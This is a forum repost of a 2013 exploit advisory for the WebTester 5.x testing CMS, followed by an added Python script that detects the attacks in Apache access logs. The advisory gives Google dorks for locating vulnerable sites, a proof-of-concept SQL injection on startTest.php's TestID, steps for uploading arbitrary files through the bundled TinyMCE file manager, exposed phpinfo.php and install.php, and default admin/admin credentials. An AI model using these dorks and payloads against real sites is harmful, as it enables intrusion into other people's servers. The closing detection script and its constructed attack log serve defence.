WebTester 5.x Multiple Vulnerabilities (Don't Eat It, Lie Down Beside It)
#1
Code:
==========================================================================================
WebTester 5.x Multiple Vulnerabilities
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : WebTester 5.x Multiple Vulnerabilities
: # Date : 15 October 2013
: # Author : X-Cisadane
: # CMS Developer : http://epplersoft.com/webtester.html
: # CMS Source Code : http://sourceforge.net/projects/webtesteronline/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) :
================================
intext:Copyright © 2003 - 2010 Eppler Software
inurl:/go.php?testID=
intitle:WebTester Online Testing
Or use your own Google Dorks :)

Proof of Concept
================

[ 1 ] SQL Injection
POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi]
  

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)
WebTester 5.x has a built-in WYSIWYG editor, TinyMCE. The attacker can upload a file through the TinyMCE File Manager.
It can be found in tiny_mce/plugins/filemanager.

POC : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
For example, if the target is http://server/
change the URL to http://server/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Pic #1 : http://i40.tinypic.com/117z390.png
Then tick : Insert filetype icon, Insert file size & Insert file modification date.
Click upload and wait until the file is sent to the server.
Pic #2 : http://i39.tinypic.com/2wluaon.png
Pic #3 : http://i40.tinypic.com/2uh0fir.png
If the file was successfully uploaded, check in the /test-images/ directory.


[ 3 ] PHPInfo() Disclosure
POC : http://[Site]/[Path]/phpinfo.php


[ 4 ] Leftover install.php File
POC : http://[Site]/[Path]/install.php


Bonus : Default Username and Password
Username : admin
Password : admin
Admin Control Panel : http://[Site]/[Path]/admin/
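The four issues above (and the default admin account) all leave distinctive traces in a web server's access log: requests for phpinfo.php or install.php, POSTs to the TinyMCE file manager's insert_file.php, a .php file being fetched from /test-images/, and a non-numeric TestID on startTest.php. The following detection script is an added example for administrators of a WebTester install, not code from the advisory or from Eppler Software. It assumes Apache combined-format access logs; the log lines, IP addresses and the file name x.php are constructed for the demonstration.

```python
"""Detect the WebTester 5.x issues listed in the advisory in Apache access logs.

Added example: the rules, the sample log and every host name below are constructed
for illustration and are not part of the advisory or of WebTester itself.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Files the advisory reports as shipped with a stock install; neither belongs on a
# production host, so any request for them is worth a finding.
LEFTOVER_FILES = {"phpinfo.php", "install.php"}
# Upload handler of the bundled TinyMCE file manager and the directory it writes to.
FILEMANAGER_UPLOAD = "/tiny_mce/plugins/filemanager/InsertFile/insert_file.php"
UPLOAD_DIR = "/test-images/"
# Extensions the PHP handler would execute if they land in the upload directory.
SCRIPT_SUFFIXES = (".php", ".php3", ".php5", ".phtml")

# Constructed sample log (not real traffic). 10.0.0.9 walks through every item
# of the advisory; the other two clients are ordinary users.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2013:10:01:02 +0000] "GET /webtester/go.php?testID=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2013:10:02:15 +0000] "GET /webtester/startTest.php?FirstName=a&LastName=a&TestID=%27 HTTP/1.1" 500 210 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2013:10:02:40 +0000] "GET /webtester/phpinfo.php HTTP/1.1" 200 64000 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2013:10:03:01 +0000] "GET /webtester/install.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2013:10:03:30 +0000] "POST /webtester/tiny_mce/plugins/filemanager/InsertFile/insert_file.php HTTP/1.1" 200 400 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2013:10:03:45 +0000] "GET /webtester/test-images/x.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Oct/2013:10:05:00 +0000] "GET /webtester/startTest.php?FirstName=Ann&LastName=Lee&TestID=12 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return the list of rule names a single access-log line triggers."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a combined-format line; nothing to evaluate
    parts = urlsplit(m["target"])
    path = parts.path
    name = posixpath.basename(path)
    query = parse_qs(parts.query)  # percent-decodes values, e.g. %27 -> '
    hits = []
    if name in LEFTOVER_FILES:
        hits.append("leftover-file-access")
    if path.endswith(FILEMANAGER_UPLOAD):
        hits.append("filemanager-upload")
    if UPLOAD_DIR in path and name.lower().endswith(SCRIPT_SUFFIXES):
        # A script being served from the image upload directory means an
        # arbitrary upload already succeeded and is now being executed.
        hits.append("script-in-upload-dir")
    if name == "startTest.php":
        # TestID is a numeric key in the application; any non-digit value is
        # injection-shaped and should never occur from the real form.
        test_id = query.get("TestID", [""])[0]
        if test_id and not test_id.isdigit():
            hits.append("sqli-testid")
    return hits


def scan(log_text):
    """Run every line through classify(); return one finding per (line, rule)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        for rule in classify(line):
            findings.append({"ip": m["ip"], "rule": rule,
                             "status": m["status"], "target": m["target"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']:<10} {f['rule']:<22} {f['status']} {f['target']}")
```

Run it against a real log with `scan(open("access.log").read())`. The "leftover-file-access" and "filemanager-upload" rules also double as a configuration check: if those paths answer with status 200 at all, the files have not been removed or access-restricted, which is the fix for items 2 to 4 regardless of who requested them.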

Source =>
Code:
http://www.exploit-db.com/exploits/28995/
www.deccal.org

